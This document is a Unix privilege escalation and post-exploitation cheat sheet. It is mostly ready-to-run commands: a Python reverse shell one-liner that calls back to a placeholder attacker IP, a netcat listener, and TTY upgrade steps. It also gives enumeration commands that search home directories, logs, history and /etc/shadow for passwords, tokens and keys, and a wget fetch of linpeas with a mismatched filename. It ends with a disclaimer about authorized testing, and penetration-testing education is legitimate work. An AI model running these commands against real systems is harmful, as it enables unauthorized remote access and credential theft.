This document provides a comprehensive guide to privilege escalation and post-exploitation enumeration on Unix-like operating systems. It includes basic and advanced techniques to help identify and exploit potential vectors for escalating privileges. Some of them should be exploitable with the help of GTFOBins.
- Python Reverse Shell & Netcat Listener
- Upgrading to a TTY Shell via Python
- Basic Post-Exploitation Enumeration Commands
- Advanced Privilege Escalation Techniques
- Using Automated Tools for Enumeration
A reverse shell connects a compromised machine to an attacker's IP for remote command execution. A Netcat listener waits on a specified port to receive incoming connections.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.x.y",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty;pty.spawn("/bin/bash")'
nc -nvlp 4444
A TTY shell enhances the interactivity and functionality of a command-line interface. Follow these steps to achieve a fully functional TTY shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
stty raw -echo; fg; reset
stty columns 200 rows 200
These commands help identify sensitive information and potential privilege escalation vectors:
find /home/ -type f -exec ls -lsha {} + | grep -E -i '.secret|secret|token|key|api|password|username|db_password|mysql_password|mysql_user|databasepassword|mysql_root_password|mysql_password|credentials|creds|pass'
find / -perm -4000 -type f 2>/dev/null
find / -perm -2000 -type f 2>/dev/null
getcap -r / 2>/dev/null
ls -la /etc/passwd && ls -la /etc/shadow && cat /etc/passwd
cat /etc/crontab && ls -al /etc/cron.* && crontab -l && ls -al /var/spool/cron/crontabs
cd /home && grep -rnH "password"
sudo -l
cat /var/log/* | grep -i 'password\|token\|key'
env
cat .bash_history
whoami && id && hostname
find / -writable -type f 2>/dev/null
find / -writable -type d 2>/dev/null
echo $PATH | tr ':' '\n' | xargs -I {} find {} -type f -executable 2>/dev/null
These techniques delve deeper into identifying and exploiting privilege escalation opportunities:
- Network Configuration:
netstat -tuln
- Checking Installed Software for Debian-based systems:
dpkg -l
- Checking Installed Software for RPM-based systems:
rpm -qa
- Checking Kernel-Version:
uname -r
- Finding Writable Binaries:
find / -perm -222 -type f 2>/dev/null
- File Integrity and Monitoring:
find / -type f -mtime -7 2>/dev/null
wget https://linpeas.sh/ && chmod +x linepeas.sh
- For macOS:
ls -la /private/var/log
- For Containers:
docker inspect <container_id>
This guide is intended for educational and authorized security testing purposes only. Please always make sure you have explicit permission before conducting any security assessments.